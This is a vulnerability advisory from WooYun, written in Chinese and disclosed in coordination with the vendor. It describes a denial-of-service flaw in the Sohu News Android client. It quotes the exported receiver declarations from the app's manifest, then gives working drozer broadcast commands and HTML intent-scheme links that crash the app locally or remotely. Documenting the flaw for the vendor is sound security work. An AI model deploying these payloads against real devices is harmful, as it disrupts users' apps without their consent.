当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0120135

漏洞标题:搜狐新闻Android客户端拒绝服务漏洞(能远程攻击利用)

相关厂商:搜狐

漏洞作者: z3roz0ne

提交时间:2015-06-18 11:57

修复时间:2015-09-16 13:10

公开时间:2015-09-16 13:10

漏洞类型:拒绝服务

危害等级:高

自评Rank:12

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-06-18: 细节已通知厂商并且等待厂商处理中
2015-06-18: 厂商已经确认,细节仅向厂商公开
2015-06-21: 细节向第三方安全合作伙伴开放
2015-08-12: 细节向核心白帽子及相关领域专家公开
2015-08-22: 细节向普通白帽子公开
2015-09-01: 细节向实习白帽子公开
2015-09-16: 细节向公众公开

简要描述:

客户端拒绝服务

详细说明:

恶意软件发起相应的intent消息可使运行中的搜狐新闻Android客户端程序崩溃掉。

漏洞证明:

@@@ 客户端信息
官网下载的最新版本:v5.2.1
@@@ AndroidManifest.xml文件中,暴露的BroadcastReceiver组件,可被任意其他应用访问,存在该问题的一共5个组件,配置如下

<receiver android:icon="@drawable/widgeticon4" android:label="@string/widget_4x4" android:name=".app.appwidget.WidgetProvider">
            <meta-data android:name="android.appwidget.provider" android:resource="@xml/appwidget_provider"/>
            <intent-filter>
                <action android:name="android.appwidget.action.APPWIDGET_ENABLED"/>
                <action android:name="android.appwidget.action.APPWIDGET_UPDATE"/>
                <action android:name="android.intent.action.WALLPAPER_CHANGED"/>
                <action android:name="android.intent.action.AIRPLANE_MODE"/>
            </intent-filter>
        </receiver>
        <receiver android:icon="@drawable/widgeticon1" android:label="@string/widget_weather" android:name=".app.appwidget.WeatherProvider">
            <meta-data android:name="android.appwidget.provider" android:resource="@xml/appwidgetweather_provider"/>
            <intent-filter>
                <action android:name="android.appwidget.action.APPWIDGET_ENABLED"/>
                <action android:name="android.appwidget.action.APPWIDGET_UPDATE"/>
                <action android:name="android.intent.action.WALLPAPER_CHANGED"/>
                <action android:name="android.intent.action.AIRPLANE_MODE"/>
            </intent-filter>
        </receiver>
        <receiver android:icon="@drawable/widgeticon2" android:label="@string/widget_4x3" android:name=".app.appwidget.NewsProvider">
            <meta-data android:name="android.appwidget.provider" android:resource="@xml/appwidgetnews_provider"/>
            <intent-filter>
                <action android:name="android.appwidget.action.APPWIDGET_ENABLED"/>
                <action android:name="android.appwidget.action.APPWIDGET_UPDATE"/>
                <action android:name="android.intent.action.WALLPAPER_CHANGED"/>
                <action android:name="android.intent.action.AIRPLANE_MODE"/>
            </intent-filter>
        </receiver>
        <receiver android:name=".app.slientapp.SlientAppDownReciver">
            <intent-filter>
                <action android:name="android.net.conn.CONNECTIVITY_CHANGE"/>
                <action android:name="com.sohu.newsclient.ACTION_SLIENTAPP_DOWNLOAD"/>
            </intent-filter>
        </receiver>


@@@ 模拟发送intent,会导致搜狐新闻客户端没有任何提示,直接崩溃重启
@@@ POC 本地利用

dz> run app.broadcast.send --component com.sohu.newsclient com.sohu.newsclient.app.appwidget.WidgetProvider
dz> run app.broadcast.send --component com.sohu.newsclient com.sohu.newsclient.app.appwidget.WeatherProvider
dz> run app.broadcast.send --component com.sohu.newsclient com.sohu.newsclient.app.appwidget.NewsProvider
dz> run app.broadcast.send --component com.sohu.newsclient com.sohu.newsclient.app.slientapp.SlientAppDownReciver


也可以用am命令,就不贴详细命令了
@@@ 远程利用,使用IntentScheme

<a href="intent:#Intent;component=com.sohu.newsclient/com.sohu.newsclient.app.appwidget.WidgetProvider;end">click</a><br>
<a href="intent:#Intent;component=com.sohu.newsclient/com.sohu.newsclient.app.appwidget.WeatherProvider;end">click</a><br>
<a href="intent:#Intent;component=com.sohu.newsclient/com.sohu.newsclient.app.appwidget.NewsProvider;end">click</a><br>
<a href="intent:#Intent;component=com.sohu.newsclient/com.sohu.newsclient.app.slientapp.SlientAppDownReciver;end">click</a><br>

修复方案:

你们更懂

版权声明:转载请注明来源 z3roz0ne@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-06-18 13:08

厂商回复:

感谢支持。

最新状态:

暂无

漏洞评价:

评论